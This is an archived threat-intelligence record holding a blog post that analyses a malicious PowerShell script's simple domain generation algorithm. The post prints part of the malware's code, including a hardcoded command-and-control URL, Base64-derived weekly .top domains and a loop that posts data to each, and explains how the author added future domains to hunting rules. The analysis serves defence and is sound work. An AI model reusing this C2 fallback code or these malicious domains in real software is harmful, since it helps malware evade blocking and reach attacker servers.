{
	"id": "c68f3710-82d6-412e-bee8-696aa013bae7",
	"created_at": "2026-05-07T02:43:14.618284Z",
	"updated_at": "2026-05-07T02:44:10.996441Z",
	"deleted_at": null,
	"sha1_hash": "634539ef25a42b747574b0e272c6b4cd05676a31",
	"title": "Simple DGA Spotted in a Malicious PowerShell",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 67557,
	"plain_text": "Simple DGA Spotted in a Malicious PowerShell\r\nBy Xavier\r\nPublished: 2020-07-14 · Archived: 2026-05-07 02:38:21 UTC\r\nDGA (“Domain Generation Algorithm”) is a technique implemented in some malware families to defeat defenders and to make the generation of IOCs (and their usage, for example to implement black lists) more difficult. When a piece of malware has to contact a C2 server, it uses domain names or IP addresses. Once the malicious code has been analyzed, it’s easy to build the list of domains/IPs used and to ask the network team to block access to these network resources. With a DGA, the list of domain names is generated based on some criteria and the attacker just has to register the newly generated domain to move the C2 infrastructure somewhere else… This is a great cat \u0026 mouse game!\r\nI found a malicious PowerShell script that implements a simple DGA. Here is the code:\r\nfunction xfyucaesbv( $etdtyefbg ){\r\n $ubezabcvwd = \"http://bito.carlaarrabito.it/\";\r\n \"ge\",\"6h\",\"sp\",\"FT\",\"4H\",\"fW\",\"mP\" | %{ $ubezabcvwd += \",\"+\"http://\"+ ( [Convert]::ToBase64String(\r\n $ubezabcvwd.split(\",\") | %{\r\n if( !$myurlpost ) {\r\n $myurlpost = $_ -replace \"=\", \"\";\r\n if(!(sendpost2($etdtyefbg + \"\u0026domen=$myurlpost\"))) {\r\n $myurlpost = $false;\r\n };\r\n Start-Sleep -s 5;\r\n }\r\n };\r\n if( $etdtyefbg -match \"status=register\" ){\r\n return \"ok\";\r\n } else {\r\n return $myurlpost;\r\n }\r\n};\r\nhttps://blog.rootshell.be/2020/07/14/simple-dga-spotted-in-a-malicious-powershell/\r\nPage 1 of 3\r\nThe most interesting line is this one:\r\nPS C:\\Users\\REM\u003e \"ge\",\"6h\",\"sp\",\"FT\",\"4H\",\"fW\",\"mP\" | %{ $ubezabcvwd += \",\"+\"http://\"+ ( [Convert]::T\r\n$ubezabcvwd.split(\",\")\r\nhttp://bito.carlaarrabito.it/\r\nhttp://z2uymda3mjk=.top/\r\nhttp://nmgymda3mjk=.top/\r\nhttp://c3aymda3mjk=.top/\r\nhttp://rlqymda3mjk=.top/\r\nhttp://negymda3mjk=.top/\r\nhttp://zlcymda3mjk=.top/\r\nhttp://bvaymda3mjk=.top/\r\nThe first hostname is hardcoded, but the others are generated by concatenating one string (out of the array) with a timestamp. The result is Base64 encoded and the padding is removed if present. Example:\r\nbase64(\"ge\" + \"200729\") = \"z2uymda3mjk=\"\r\nThe fact that the timestamp is based on ‘%v’ (which indicates the number of the current week, 0-51) is a good indicator of a DGA. One domain will be generated every week.\r\nI tried to resolve the domain names from the list above but none of them is registered right now. I generated domains for the next two months and I’ve added them to my hunting rules.\r\nI’ll keep an eye on them!\r\nSource: https://blog.rootshell.be/2020/07/14/simple-dga-spotted-in-a-malicious-powershell/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.rootshell.be/2020/07/14/simple-dga-spotted-in-a-malicious-powershell/"
	],
	"report_names": [
		"simple-dga-spotted-in-a-malicious-powershell"
	],
	"threat_actors": [],
	"ts_created_at": 1778121794,
	"ts_updated_at": 1778121850,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/634539ef25a42b747574b0e272c6b4cd05676a31.pdf",
		"text": "https://archive.orkl.eu/634539ef25a42b747574b0e272c6b4cd05676a31.txt",
		"img": "https://archive.orkl.eu/634539ef25a42b747574b0e272c6b4cd05676a31.jpg"
	}
}